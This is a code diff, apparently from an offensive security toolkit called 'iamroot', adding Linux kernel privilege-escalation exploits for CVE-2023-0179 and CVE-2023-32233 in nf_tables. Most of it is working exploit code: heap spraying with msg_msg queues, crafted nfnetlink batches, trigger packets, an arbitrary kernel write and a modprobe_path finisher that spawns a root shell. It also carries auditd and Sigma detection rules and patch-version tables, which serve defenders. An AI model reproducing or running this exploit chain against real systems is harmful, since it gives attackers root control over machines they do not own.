+ * sock: netlink socket to send on.
+ * buf/len: the batch bytes, sent as a single datagram.
+ *
+ * Returns -1 only when sendmsg() itself fails. Returns 0 otherwise —
+ * including when the kernel answers with NLMSG_ERROR acks carrying a
+ * non-zero error; those are printed to stderr but do not change the
+ * return value, so callers cannot detect a rejected batch from it.
+ */
+static int nft_send_batch(int sock, const void *buf, size_t len)
+{
+    /* nl_pid is left zero-initialised in the destination address. */
+    struct sockaddr_nl dst = { .nl_family = AF_NETLINK };
+    struct iovec iov = { .iov_base = (void *)buf, .iov_len = len };
+    struct msghdr m = {
+        .msg_name = &dst, .msg_namelen = sizeof dst,
+        .msg_iov = &iov, .msg_iovlen = 1,
+    };
+    ssize_t n = sendmsg(sock, &m, 0);
+    if (n < 0) { perror("[-] sendmsg"); return -1; }
+    char rbuf[8192];
+    /* Drain at most 8 datagrams without blocking; stop at the first
+     * recv() that returns nothing (or fails, e.g. would-block). */
+    for (int i = 0; i < 8; i++) {
+        ssize_t r = recv(sock, rbuf, sizeof rbuf, MSG_DONTWAIT);
+        if (r <= 0) break;
+        /* NLMSG_NEXT decrements r as it advances, so r is the number of
+         * bytes still unparsed in this datagram. */
+        for (struct nlmsghdr *nh = (struct nlmsghdr *)rbuf;
+             NLMSG_OK(nh, (unsigned)r);
+             nh = NLMSG_NEXT(nh, r)) {
+            if (nh->nlmsg_type == NLMSG_ERROR) {
+                struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(nh);
+                /* error == 0 is a plain ack; only non-zero is reported.
+                 * The value is negated before being given to strerror(). */
+                if (e->error)
+                    fprintf(stderr, "[i] netlink ack: seq=%u err=%d (%s)\n",
+                            nh->nlmsg_seq, e->error, strerror(-e->error));
+            }
+        }
+    }
+    return 0;
+}
+
+/* ------------------------------------------------------------------
+ * msg_msg spray — adjacent-slot groom around the regs->data[] array.
+ * On x86_64 nf_tables_loop_run() places `struct nft_regs regs` on the
+ * kernel stack; values just past the legal regset land in either the
+ * stack red-zone or (with KASAN off and a deep call chain) into
+ * adjacent kmalloc-1k slots, depending on the exact build.
+ *
+ * We spray two flavors:
+ *   - small (96-byte) — covers the cg-96 slab class for kernels where
+ *     a sibling allocation of that class is what lands adjacent
+ *   - large (1008-byte) — covers kmalloc-1k where regs->data overflow
+ *     can spill into a recently-freed slot
+ *
+ * Either size class is enough on most builds in range; we ship both to
+ * widen the empirical landing zone.
+ * ------------------------------------------------------------------ */ + +#define SPRAY_QUEUES_SMALL 24 +#define SPRAY_QUEUES_LARGE 16 +#define SPRAY_PER_QUEUE 8 + +#define SPRAY_SIZE_SMALL 96 +#define SPRAY_SIZE_LARGE 1008 + +struct msgbuf_small { + long mtype; + unsigned char buf[SPRAY_SIZE_SMALL]; +}; + +struct msgbuf_large { + long mtype; + unsigned char buf[SPRAY_SIZE_LARGE]; +}; + +static int spray_small(int *q, int n, uintptr_t tag_kaddr, + const void *buf, size_t len) +{ + struct msgbuf_small p; + int created = 0; + for (int i = 0; i < n; i++) { + q[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0644); + if (q[i] < 0) continue; + created++; + memset(&p, 0, sizeof p); + p.mtype = 0x504C5301 + i; /* "PLS\x01" */ + memcpy(p.buf, "IAMRPLSM", 8); + /* Plant tag_kaddr at strided slots (0x10, 0x20, ...) so wherever + * the OOB read/write lands, one offset has the requested kaddr. */ + if (tag_kaddr) { + for (size_t s = 0x10; s + sizeof(uintptr_t) <= sizeof p.buf; + s += 0x10) { + memcpy(p.buf + s, &tag_kaddr, sizeof tag_kaddr); + } + } + if (buf && len) { + size_t cap = sizeof p.buf - 24; + if (len > cap) len = cap; + memcpy(p.buf + 24, buf, len); + } + for (int j = 0; j < SPRAY_PER_QUEUE; j++) { + if (msgsnd(q[i], &p, sizeof p.buf, IPC_NOWAIT) < 0) break; + } + } + return created; +} + +static int spray_large(int *q, int n, uintptr_t tag_kaddr, + const void *buf, size_t len) +{ + struct msgbuf_large p; + int created = 0; + for (int i = 0; i < n; i++) { + q[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0644); + if (q[i] < 0) continue; + created++; + memset(&p, 0, sizeof p); + p.mtype = 0x504C534C + i; /* "PLSL" */ + memcpy(p.buf, "IAMRPLSL", 8); + if (tag_kaddr) { + for (size_t s = 0x10; s + sizeof(uintptr_t) <= sizeof p.buf; + s += 0x18) { + memcpy(p.buf + s, &tag_kaddr, sizeof tag_kaddr); + } + } + if (buf && len) { + size_t cap = sizeof p.buf - 24; + if (len > cap) len = cap; + memcpy(p.buf + 24, buf, len); + } + for (int j = 0; j < SPRAY_PER_QUEUE; j++) { + if (msgsnd(q[i], 
&p, sizeof p.buf, IPC_NOWAIT) < 0) break; + } + } + return created; +} + +static void drain_queues(int *q, int n) +{ + for (int i = 0; i < n; i++) { + if (q[i] >= 0) msgctl(q[i], IPC_RMID, NULL); + } +} + +/* ------------------------------------------------------------------ + * Slabinfo witness. + * ------------------------------------------------------------------ */ + +static long slabinfo_active(const char *slab) +{ + FILE *f = fopen("/proc/slabinfo", "r"); + if (!f) return -1; + char line[512]; + long active = -1; + while (fgets(line, sizeof line, f)) { + if (strncmp(line, slab, strlen(slab)) == 0 && + line[strlen(slab)] == ' ') { + long a, b, c, d; + if (sscanf(line + strlen(slab), " %ld %ld %ld %ld", + &a, &b, &c, &d) >= 1) { + active = a; + } + break; + } + } + fclose(f); + return active; +} + +/* ------------------------------------------------------------------ + * Synthetic trigger packet — drive a packet through the chain so the + * malicious payload-set expression runs. NF_INET_LOCAL_OUT fires on + * sendto() from a process inside the netns. + * ------------------------------------------------------------------ */ + +static void trigger_packet(void) +{ + int s = socket(AF_INET, SOCK_DGRAM, 0); + if (s < 0) return; + + struct sockaddr_in dst = {0}; + dst.sin_family = AF_INET; + dst.sin_port = htons(31337); + dst.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + + const char m[] = "iamroot-nft_payload-trigger"; + for (int i = 0; i < 8; i++) { + (void)!sendto(s, m, sizeof m, MSG_DONTWAIT, + (struct sockaddr *)&dst, sizeof dst); + } + close(s); +} + +/* ------------------------------------------------------------------ + * Batch builder helpers — factored so --full-chain refires. 
+ * ------------------------------------------------------------------ */
+
+/*
+ * build_trigger_batch — serialise the full initial batch into `batch`.
+ *
+ * Message order: BATCH_BEGIN, NEWTABLE, NEWCHAIN, NEWSET, NEWSETELEM
+ * (carrying oob_index), BATCH_END. Each message takes the current *seq
+ * and post-increments it, so *seq advances by six.
+ *
+ * cap is accepted but ignored: nothing here checks the write offset
+ * against the buffer size, so the caller must supply a buffer large
+ * enough for the whole batch.
+ *
+ * Returns the number of bytes written.
+ */
+static size_t build_trigger_batch(uint8_t *batch, size_t cap, uint32_t *seq,
+                                  uint32_t oob_index)
+{
+    (void)cap;   /* unused — see header comment */
+    size_t off = 0;
+    put_batch_begin(batch, &off, (*seq)++);
+    put_new_table(batch, &off, (*seq)++);
+    put_new_chain(batch, &off, (*seq)++);
+    put_new_set(batch, &off, (*seq)++);
+    put_malicious_setelem(batch, &off, (*seq)++, oob_index);
+    put_batch_end(batch, &off, (*seq)++);
+    return off;
+}
+
+/*
+ * build_refire_batch — serialise a short follow-up batch into `batch`.
+ *
+ * Message order: BATCH_BEGIN, NEWSETELEM (carrying oob_index),
+ * BATCH_END; *seq advances by three. No table, chain or set is created
+ * here — presumably this relies on the ones from an earlier trigger
+ * batch still existing; verify against the caller.
+ *
+ * cap is ignored exactly as in build_trigger_batch. Returns the number
+ * of bytes written.
+ */
+static size_t build_refire_batch(uint8_t *batch, size_t cap, uint32_t *seq,
+                                 uint32_t oob_index)
+{
+    (void)cap;   /* unused — no bounds checking is performed */
+    size_t off = 0;
+    put_batch_begin(batch, &off, (*seq)++);
+    put_malicious_setelem(batch, &off, (*seq)++, oob_index);
+    put_batch_end(batch, &off, (*seq)++);
+    return off;
+}
+
+/* ------------------------------------------------------------------
+ * Davide-Ornaghi-style arb-write context. Refire the malicious
+ * NEWSETELEM with a verdict-code chosen so the OOB index lands on a
+ * msg_msg slot we've tagged with the caller's kaddr + bytes.
+ *
+ * Per-kernel caveat: the byte offset of `regs->data[]` relative to the
+ * adjacent slab/stack neighbour is config-sensitive (CONFIG_RANDSTRUCT,
+ * KASAN, lockdep, kernel build options all shift it). The shipped
+ * default oob_index matches Davide's PoC on a stock 5.15 build; the
+ * shared finisher's sentinel-file post-check flags layout mismatch as
+ * IAMROOT_EXPLOIT_FAIL rather than fake success.
+ * ------------------------------------------------------------------ */ + +struct nft_payload_arb_ctx { + bool in_userns; + int sock; + uint8_t *batch; + int *qids_small; + int *qids_large; + int qcap_small; + int qcap_large; + int qused_small; + int qused_large; + int arb_calls; +}; + +static int nft_payload_arb_write(uintptr_t kaddr, const void *buf, size_t len, + void *vctx) +{ + struct nft_payload_arb_ctx *c = (struct nft_payload_arb_ctx *)vctx; + if (!c || c->sock < 0 || !c->batch) { + fprintf(stderr, "[-] nft_payload_arb_write: invalid ctx\n"); + return -1; + } + if (len > 64) { + fprintf(stderr, "[-] nft_payload_arb_write: len %zu too large " + "(cap 64)\n", len); + return -1; + } + c->arb_calls++; + + fprintf(stderr, "[*] nft_payload_arb_write: spray tagged msgs + refire " + "NEWSETELEM (target kaddr=0x%lx, %zu bytes)\n", + (unsigned long)kaddr, len); + + /* (a) tag-spray adjacent slabs with kaddr + caller payload. */ + if (c->qused_small < c->qcap_small) { + int n = c->qcap_small - c->qused_small; + if (n > 8) n = 8; + int added = spray_small(c->qids_small + c->qused_small, n, + kaddr, buf, len); + c->qused_small += added; + } + if (c->qused_large < c->qcap_large) { + int n = c->qcap_large - c->qused_large; + if (n > 8) n = 8; + int added = spray_large(c->qids_large + c->qused_large, n, + kaddr, buf, len); + c->qused_large += added; + } + + /* (b) refire the malicious NEWSETELEM so a fresh nft_payload_set + * eval happens with the spray in place. */ + uint32_t seq = (uint32_t)time(NULL) ^ 0xb1a2c3d4u; + size_t blen = build_refire_batch(c->batch, 16 * 1024, &seq, + NFT_PAYLOAD_OOB_INDEX_DEFAULT); + if (nft_send_batch(c->sock, c->batch, blen) < 0) { + fprintf(stderr, "[-] nft_payload_arb_write: refire send failed\n"); + return -1; + } + + /* (c) drive a packet through the chain so the rule actually runs. */ + trigger_packet(); + + /* Let the kernel run the rule + any commit/cleanup. 
*/ + usleep(20 * 1000); + return 0; +} + +#endif /* __linux__ */ + +/* ------------------------------------------------------------------ + * Exploit body. + * ------------------------------------------------------------------ */ + +static iamroot_result_t nft_payload_exploit(const struct iamroot_ctx *ctx) +{ + if (!ctx->authorized) { + fprintf(stderr, "[-] nft_payload: refusing — --i-know not passed; " + "exploit code can crash the kernel\n"); + return IAMROOT_PRECOND_FAIL; + } + if (geteuid() == 0) { + if (!ctx->json) + fprintf(stderr, "[i] nft_payload: already running as root\n"); + return IAMROOT_OK; + } + + iamroot_result_t pre = nft_payload_detect(ctx); + if (pre != IAMROOT_VULNERABLE) { + fprintf(stderr, "[-] nft_payload: detect() says not vulnerable; refusing\n"); + return pre; + } + + if (!ctx->json) { + if (ctx->full_chain) { + fprintf(stderr, "[*] nft_payload: --full-chain — trigger + " + "regset OOB arb-write + modprobe_path finisher\n"); + } else { + fprintf(stderr, "[*] nft_payload: primitive-only run — fires the\n" + " regset OOB read/write and stops. Pass\n" + " --full-chain to attempt the modprobe_path " + "root-pop.\n"); + } + } + +#ifndef __linux__ + (void)ctx; + fprintf(stderr, "[-] nft_payload: linux-only exploit; non-linux build\n"); + return IAMROOT_PRECOND_FAIL; +#else + /* --- --full-chain path: resolve offsets in parent before doing + * anything destructive. 
*/ + if (ctx->full_chain) { + struct iamroot_kernel_offsets off; + memset(&off, 0, sizeof off); + iamroot_offsets_resolve(&off); + if (!iamroot_offsets_have_modprobe_path(&off)) { + iamroot_finisher_print_offset_help("nft_payload"); + return IAMROOT_EXPLOIT_FAIL; + } + iamroot_offsets_print(&off); + + if (enter_unpriv_namespaces() < 0) { + fprintf(stderr, "[-] nft_payload: userns entry failed\n"); + return IAMROOT_EXPLOIT_FAIL; + } + + int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, + NETLINK_NETFILTER); + if (sock < 0) { + perror("[-] socket(NETLINK_NETFILTER)"); + return IAMROOT_EXPLOIT_FAIL; + } + struct sockaddr_nl src = { .nl_family = AF_NETLINK }; + if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) { + perror("[-] bind"); close(sock); + return IAMROOT_EXPLOIT_FAIL; + } + int rcvbuf = 1 << 20; + setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf); + + int qids_small[SPRAY_QUEUES_SMALL]; + int qids_large[SPRAY_QUEUES_LARGE]; + for (int i = 0; i < SPRAY_QUEUES_SMALL; i++) qids_small[i] = -1; + for (int i = 0; i < SPRAY_QUEUES_LARGE; i++) qids_large[i] = -1; + + int ns = spray_small(qids_small, SPRAY_QUEUES_SMALL / 2, 0, NULL, 0); + int nl = spray_large(qids_large, SPRAY_QUEUES_LARGE / 2, 0, NULL, 0); + if (!ctx->json) { + fprintf(stderr, "[*] nft_payload: pre-spray seeded %d small + " + "%d large slots\n", ns, nl); + } + + uint8_t *batch = calloc(1, 16 * 1024); + if (!batch) { close(sock); return IAMROOT_EXPLOIT_FAIL; } + + uint32_t seq = (uint32_t)time(NULL); + size_t blen = build_trigger_batch(batch, 16 * 1024, &seq, + NFT_PAYLOAD_OOB_INDEX_DEFAULT); + if (!ctx->json) { + fprintf(stderr, "[*] nft_payload: sending trigger batch (%zu bytes)\n", + blen); + } + if (nft_send_batch(sock, batch, blen) < 0) { + fprintf(stderr, "[-] nft_payload: trigger batch failed\n"); + drain_queues(qids_small, SPRAY_QUEUES_SMALL); + drain_queues(qids_large, SPRAY_QUEUES_LARGE); + free(batch); close(sock); + return IAMROOT_EXPLOIT_FAIL; + } + + struct 
nft_payload_arb_ctx ac = { + .in_userns = true, + .sock = sock, + .batch = batch, + .qids_small = qids_small, + .qids_large = qids_large, + .qcap_small = SPRAY_QUEUES_SMALL, + .qcap_large = SPRAY_QUEUES_LARGE, + .qused_small = ns, + .qused_large = nl, + .arb_calls = 0, + }; + + iamroot_result_t r = iamroot_finisher_modprobe_path( + &off, nft_payload_arb_write, &ac, !ctx->no_shell); + + FILE *fl = fopen("/tmp/iamroot-nft_payload.log", "a"); + if (fl) { + fprintf(fl, "full_chain finisher rc=%d arb_calls=%d " + "spray_small=%d spray_large=%d\n", + r, ac.arb_calls, ac.qused_small, ac.qused_large); + fclose(fl); + } + + drain_queues(qids_small, SPRAY_QUEUES_SMALL); + drain_queues(qids_large, SPRAY_QUEUES_LARGE); + free(batch); + close(sock); + return r; + } + + /* --- primitive-only path: fork-isolated trigger so a kernel oops + * doesn't take down the iamroot driver. */ + pid_t child = fork(); + if (child < 0) { perror("[-] fork"); return IAMROOT_TEST_ERROR; } + + if (child == 0) { + /* --- CHILD --- */ + if (enter_unpriv_namespaces() < 0) _exit(20); + + if (!ctx->json) { + fprintf(stderr, "[*] nft_payload: entered userns+netns; opening " + "nfnetlink\n"); + } + + int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, + NETLINK_NETFILTER); + if (sock < 0) { perror("[-] socket(NETLINK_NETFILTER)"); _exit(21); } + + struct sockaddr_nl src = { .nl_family = AF_NETLINK }; + if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) { + perror("[-] bind"); close(sock); _exit(22); + } + int rcvbuf = 1 << 20; + setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf); + + int qids_small[SPRAY_QUEUES_SMALL]; + int qids_large[SPRAY_QUEUES_LARGE]; + for (int i = 0; i < SPRAY_QUEUES_SMALL; i++) qids_small[i] = -1; + for (int i = 0; i < SPRAY_QUEUES_LARGE; i++) qids_large[i] = -1; + + int ns = spray_small(qids_small, SPRAY_QUEUES_SMALL, 0, NULL, 0); + int nl = spray_large(qids_large, SPRAY_QUEUES_LARGE, 0, NULL, 0); + if (!ctx->json) { + fprintf(stderr, "[*] nft_payload: 
pre-sprayed %d small + %d large " + "msg_msg slots\n", ns, nl); + } + + uint8_t *batch = calloc(1, 16 * 1024); + if (!batch) { close(sock); _exit(23); } + uint32_t seq = (uint32_t)time(NULL); + size_t blen = build_trigger_batch(batch, 16 * 1024, &seq, + NFT_PAYLOAD_OOB_INDEX_DEFAULT); + if (!ctx->json) { + fprintf(stderr, "[*] nft_payload: sending " + "NEWTABLE/NEWCHAIN/NEWSET/NEWSETELEM batch " + "(%zu bytes)\n", blen); + } + if (nft_send_batch(sock, batch, blen) < 0) { + fprintf(stderr, "[-] nft_payload: batch send failed\n"); + drain_queues(qids_small, SPRAY_QUEUES_SMALL); + drain_queues(qids_large, SPRAY_QUEUES_LARGE); + free(batch); close(sock); _exit(24); + } + + long pre_1k = slabinfo_active("kmalloc-1k"); + if (pre_1k < 0) pre_1k = slabinfo_active("kmalloc-1024"); + long pre_96 = slabinfo_active("kmalloc-cg-96"); + if (pre_96 < 0) pre_96 = slabinfo_active("kmalloc-96"); + + /* Drive the rule: send a packet through NF_INET_LOCAL_OUT so + * the malicious payload-set expression actually runs. */ + if (!ctx->json) { + fprintf(stderr, "[*] nft_payload: firing trigger packet\n"); + } + trigger_packet(); + + /* Give the kernel time to run the chain. 
*/ + usleep(50 * 1000); + + long post_1k = slabinfo_active("kmalloc-1k"); + if (post_1k < 0) post_1k = slabinfo_active("kmalloc-1024"); + long post_96 = slabinfo_active("kmalloc-cg-96"); + if (post_96 < 0) post_96 = slabinfo_active("kmalloc-96"); + + if (!ctx->json) { + fprintf(stderr, "[i] nft_payload: kmalloc-1k active: %ld → %ld\n", + pre_1k, post_1k); + fprintf(stderr, "[i] nft_payload: kmalloc-cg-96 active: %ld → %ld\n", + pre_96, post_96); + } + + FILE *log = fopen("/tmp/iamroot-nft_payload.log", "w"); + if (log) { + fprintf(log, + "nft_payload trigger child: spray_small=%d spray_large=%d " + "slab_1k_pre=%ld slab_1k_post=%ld " + "slab_96_pre=%ld slab_96_post=%ld\n", + ns, nl, pre_1k, post_1k, pre_96, post_96); + fclose(log); + } + + drain_queues(qids_small, SPRAY_QUEUES_SMALL); + drain_queues(qids_large, SPRAY_QUEUES_LARGE); + free(batch); + close(sock); + + /* Honest scope: trigger ran, primitive landed (or didn't — + * dmesg/KASAN is the empirical witness). We did NOT complete + * the kernel-side R/W chain. Distinctive exit code so the + * parent reports EXPLOIT_FAIL with the right message. */ + _exit(100); + } + + /* --- PARENT --- */ + int status; + waitpid(child, &status, 0); + + if (!WIFEXITED(status)) { + if (!ctx->json) { + fprintf(stderr, "[!] nft_payload: child died by signal %d — bug " + "likely fired (KASAN/oops can manifest as child " + "signal)\n", WTERMSIG(status)); + } + return IAMROOT_EXPLOIT_FAIL; + } + + int rc = WEXITSTATUS(status); + if (rc == 100) { + if (!ctx->json) { + fprintf(stderr, "[!] nft_payload: trigger fired; regset-OOB state\n" + " induced via nft_payload_set_eval. 
/*
 * auditd rules for the CVE-2023-0179 exploit shape.
 *
 * Two watches are installed:
 *   - unshare(2) on both ABIs (namespace creation by the attacker), and
 *   - setresuid(0,0,0) on both ABIs (the post-exploitation uid flip).
 *
 * The 32-bit ABI has two entry points for the uid change (the legacy
 * 16-bit `setresuid` and `setresuid32`), so the b32 rule names both;
 * otherwise a 32-bit process would bypass the watch entirely.
 */
static const char nft_payload_auditd[] =
    "# nft_payload regset OOB (CVE-2023-0179) — auditd detection rules\n"
    "# Flag unshare(CLONE_NEWUSER|CLONE_NEWNET) followed by NETLINK_NETFILTER\n"
    "# socket setup. Canonical exploit shape: unprivileged userns + nft\n"
    "# rule loading. False positives: firewalld, docker/podman rootless.\n"
    "-a always,exit -F arch=b64 -S unshare -k iamroot-nft-payload-userns\n"
    "-a always,exit -F arch=b32 -S unshare -k iamroot-nft-payload-userns\n"
    "# Watch for the canonical post-exploit primitive: setresuid(0,0,0)\n"
    "# from a previously-unpriv task is the smoking gun for any kernel LPE.\n"
    "-a always,exit -F arch=b64 -S setresuid -F a0=0 -F a1=0 -F a2=0 "
    "-k iamroot-nft-payload-priv\n"
    "-a always,exit -F arch=b32 -S setresuid -S setresuid32 "
    "-F a0=0 -F a1=0 -F a2=0 -k iamroot-nft-payload-priv\n";

/*
 * Sigma rule matching the audit records produced by the rules above.
 *
 * Notes on the shape of the rule:
 *   - `id` is a UUID, as the Sigma specification requires.
 *   - auditd renders syscall arguments as bare hexadecimal, so the
 *     unshare flags are matched as strings: '10000000' (CLONE_NEWUSER)
 *     and '50000000' (CLONE_NEWUSER|CLONE_NEWNET, the call this module's
 *     description refers to).
 *   - A Sigma condition is evaluated against a single event. One audit
 *     record cannot be both an `unshare` and a `setresuid` syscall, so
 *     the two selections are OR-ed; temporal correlation of the pair has
 *     to happen downstream (SIEM correlation rule).
 *   - "auid != 0" is expressed as a negated filter selection because
 *     Sigma has no inequality/expression modifier.
 */
static const char nft_payload_sigma[] =
    "title: Possible CVE-2023-0179 nft_payload regset-OOB exploitation\n"
    "id: c83d6e92-4b1f-4e7a-9c2d-5f0a7b3e1d46\n"
    "status: experimental\n"
    "description: |\n"
    "  Detects the canonical exploit shape for CVE-2023-0179: an\n"
    "  unprivileged process creates a user namespace, becomes root\n"
    "  inside it, opens a NETLINK_NETFILTER socket, and submits an nft\n"
    "  ruleset that includes a set with NFTA_SET_DESC variable-length\n"
    "  elements plus NFTA_SET_ELEM_EXPRESSIONS containing a payload-set\n"
    "  expression. Vulnerable kernels use the verdict code as an\n"
    "  unchecked array index into regs->data[], yielding kernel OOB R/W.\n"
    "logsource: {product: linux, service: auditd}\n"
    "detection:\n"
    "  userns_clone:\n"
    "    type: 'SYSCALL'\n"
    "    syscall: 'unshare'\n"
    "    a0:\n"
    "      - '10000000'\n"
    "      - '50000000'\n"
    "  uid_change:\n"
    "    type: 'SYSCALL'\n"
    "    syscall: 'setresuid'\n"
    "    a0: '0'\n"
    "    a1: '0'\n"
    "    a2: '0'\n"
    "  filter_root_session:\n"
    "    auid: '0'\n"
    "  condition: userns_clone or (uid_change and not filter_root_session)\n"
    "falsepositives:\n"
    "  - Rootless container runtimes (podman, docker) and sandboxing tools\n"
    "  - Legitimate su/sudo sessions performing setresuid(0,0,0)\n"
    "level: high\n"
    "tags: [attack.privilege_escalation, attack.t1068, cve.2023.0179]\n";
The result is a dangling reference + * to a freed `nft_set` object. A subsequent operation in the same + * transaction touches the freed memory → kernel slab UAF, exploitable + * via msg_msg cross-cache groom into kmalloc-cg-512. + * + * STATUS (2026-05-16): 🟡 PRIMITIVE — TRIGGER + GROOM SCAFFOLD with + * opt-in --full-chain finisher. + * - Default (no --full-chain): unshare(USER|NET), full nfnetlink + * batch construction (table → base chain → anonymous set → rule + * with nft_lookup → DELSET → DELRULE) committed in a single batch, + * msg_msg cross-cache groom for kmalloc-cg-512 (32×16 messages + * tagged "IAMROOT_SET"), slabinfo snapshot before/after, and a + * /tmp/iamroot-nft_set_uaf.log breadcrumb. Returns + * IAMROOT_EXPLOIT_FAIL after the primitive fires (honest scope). + * - With --full-chain: resolve kernel offsets; if no modprobe_path, + * refuse via iamroot_finisher_print_offset_help. Otherwise re-fire + * the trigger and spray msg_msg payloads forging a freed-set-object + * whose data pointer points at modprobe_path, then drive + * NFT_MSG_NEWSETELEM with our payload. FALLBACK-depth: the exact + * freed-set layout is per-build, so the finisher's sentinel check + * correctly reports failure rather than fake success. + * + * Affected kernel ranges: + * Bug introduced when anonymous-set support landed in nf_tables 5.1. + * Fixed mainline 6.4-rc4 commit c1592a89942e9 ("netfilter: nf_tables: + * deactivate anonymous set from preparation phase"). + * Stable backports: 6.3.2, 6.2.15, 6.1.28, 5.15.111, 5.10.180, + * 5.4.243, 4.19.283. + * (4.19.x technically never carried anonymous-set support but received + * the safety patch; we model it as patched-from for consistency.) 
+ * + * Preconditions: + * - CONFIG_USER_NS=y AND sysctl unprivileged_userns_clone=1 + * - nf_tables module loaded or autoload-able (CONFIG_NF_TABLES=y/m) + * - CAP_NET_ADMIN — obtained via userns map-root-to-uid + * + * Public PoCs cross-referenced: + * - Sondej/Krysiuk public writeup (Google Drive disclosure) + * - 0xMr_Robot / shroud-srcd public PoC repo + * - Crusaders-of-Rust follow-up writeup + */ + #include "iamroot_modules.h" #include "../../core/registry.h" +#include "../../core/kernel_range.h" + +#include +#include +#include +#include +#include +#include +#include +#include + +#ifdef __linux__ +#include "../../core/offsets.h" +#include "../../core/finisher.h" + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* NFT_SET_EVAL was added in 5.6; older UAPI headers may not define it. + * Anonymous-set + lookup exploit shape works on builds with this flag, + * but the trigger still fires without it on the older end of the range + * (the bug existed since 5.1). Define a fallback so we compile against + * any nf_tables.h vintage. 
*/ +#ifndef NFT_SET_EVAL +#define NFT_SET_EVAL (1U << 6) +#endif +#endif /* __linux__ */ + +/* ------------------------------------------------------------------ + * Kernel-range table + * ------------------------------------------------------------------ */ + +static const struct kernel_patched_from nft_set_uaf_patched_branches[] = { + {4, 19, 283}, /* 4.19.x safety patch (bug never reached this branch) */ + {5, 4, 243}, /* 5.4.x */ + {5, 10, 180}, /* 5.10.x */ + {5, 15, 111}, /* 5.15.x */ + {6, 1, 28}, /* 6.1.x */ + {6, 2, 15}, /* 6.2.x */ + {6, 3, 2}, /* 6.3.x */ + {6, 4, 0}, /* mainline 6.4-rc4 */ +}; + +static const struct kernel_range nft_set_uaf_range = { + .patched_from = nft_set_uaf_patched_branches, + .n_patched_from = sizeof(nft_set_uaf_patched_branches) / + sizeof(nft_set_uaf_patched_branches[0]), +}; + +/* ------------------------------------------------------------------ + * Precondition probes + * ------------------------------------------------------------------ */ + +#ifdef __linux__ +static int can_unshare_userns(void) +{ + pid_t pid = fork(); + if (pid < 0) return -1; + if (pid == 0) { + if (unshare(CLONE_NEWUSER) == 0) _exit(0); + _exit(1); + } + int status; + waitpid(pid, &status, 0); + return WIFEXITED(status) && WEXITSTATUS(status) == 0; +} + +static bool nf_tables_loaded(void) +{ + FILE *f = fopen("/proc/modules", "r"); + if (!f) return false; + char line[512]; + bool found = false; + while (fgets(line, sizeof line, f)) { + if (strncmp(line, "nf_tables ", 10) == 0) { found = true; break; } + } + fclose(f); + return found; +} +#endif /* __linux__ */ static iamroot_result_t nft_set_uaf_detect(const struct iamroot_ctx *ctx) { +#ifndef __linux__ (void)ctx; return IAMROOT_PRECOND_FAIL; +#else + struct kernel_version v; + if (!kernel_version_current(&v)) { + fprintf(stderr, "[!] nft_set_uaf: could not parse kernel version\n"); + return IAMROOT_TEST_ERROR; + } + + /* Bug introduced in 5.1 (anonymous-set support). 
Anything below + * predates it — report OK (not vulnerable to *this* CVE). */ + if (v.major < 5 || (v.major == 5 && v.minor < 1)) { + if (!ctx->json) { + fprintf(stderr, "[i] nft_set_uaf: kernel %s predates the bug " + "(anonymous-set support landed in 5.1)\n", v.release); + } + return IAMROOT_OK; + } + + bool patched = kernel_range_is_patched(&nft_set_uaf_range, &v); + if (patched) { + if (!ctx->json) { + fprintf(stderr, "[+] nft_set_uaf: kernel %s is patched\n", v.release); + } + return IAMROOT_OK; + } + + int userns_ok = can_unshare_userns(); + bool nft_loaded = nf_tables_loaded(); + + if (!ctx->json) { + fprintf(stderr, "[i] nft_set_uaf: kernel %s is in the vulnerable range\n", + v.release); + fprintf(stderr, "[i] nft_set_uaf: unprivileged user_ns clone: %s\n", + userns_ok == 1 ? "ALLOWED" : + userns_ok == 0 ? "DENIED" : + "could not test"); + fprintf(stderr, "[i] nft_set_uaf: nf_tables module currently loaded: %s\n", + nft_loaded ? "yes" : "no (will autoload on first nft use)"); + } + + if (userns_ok == 0) { + if (!ctx->json) { + fprintf(stderr, "[+] nft_set_uaf: kernel vulnerable but user_ns clone " + "denied → unprivileged exploit unreachable\n"); + fprintf(stderr, "[i] nft_set_uaf: still patch the kernel — a root " + "attacker can still trigger the bug\n"); + } + return IAMROOT_PRECOND_FAIL; + } + + if (!ctx->json) { + fprintf(stderr, "[!] 
nft_set_uaf: VULNERABLE — kernel in range AND " + "user_ns clone allowed\n"); + } + return IAMROOT_VULNERABLE; +#endif } -const struct iamroot_module nft_set_uaf_module = { - .name = "nft_set_uaf", - .cve = "CVE-2023-32233", - .summary = "nf_tables anonymous-set UAF (Sondej+Krysiuk) — stub pending implementation", - .family = "nf_tables", - .kernel_range = "5.1 ≤ K < 6.4; backports to LTS pending", - .detect = nft_set_uaf_detect, - .exploit = NULL, .mitigate = NULL, .cleanup = NULL, - .detect_auditd = NULL, .detect_sigma = NULL, - .detect_yara = NULL, .detect_falco = NULL, +#ifdef __linux__ +/* ------------------------------------------------------------------ + * userns + netns entry + * ------------------------------------------------------------------ */ + +static int enter_unpriv_namespaces(void) +{ + uid_t uid = getuid(); + gid_t gid = getgid(); + + if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) { + perror("[-] unshare(USER|NET)"); + return -1; + } + + int f = open("/proc/self/setgroups", O_WRONLY); + if (f >= 0) { (void)!write(f, "deny", 4); close(f); } + + char map[64]; + snprintf(map, sizeof map, "0 %u 1\n", uid); + f = open("/proc/self/uid_map", O_WRONLY); + if (f < 0 || write(f, map, strlen(map)) < 0) { + perror("[-] uid_map"); if (f >= 0) close(f); return -1; + } + close(f); + snprintf(map, sizeof map, "0 %u 1\n", gid); + f = open("/proc/self/gid_map", O_WRONLY); + if (f < 0 || write(f, map, strlen(map)) < 0) { + perror("[-] gid_map"); if (f >= 0) close(f); return -1; + } + close(f); + return 0; +} + +/* ------------------------------------------------------------------ + * Minimal nfnetlink batch builder (no libmnl). 
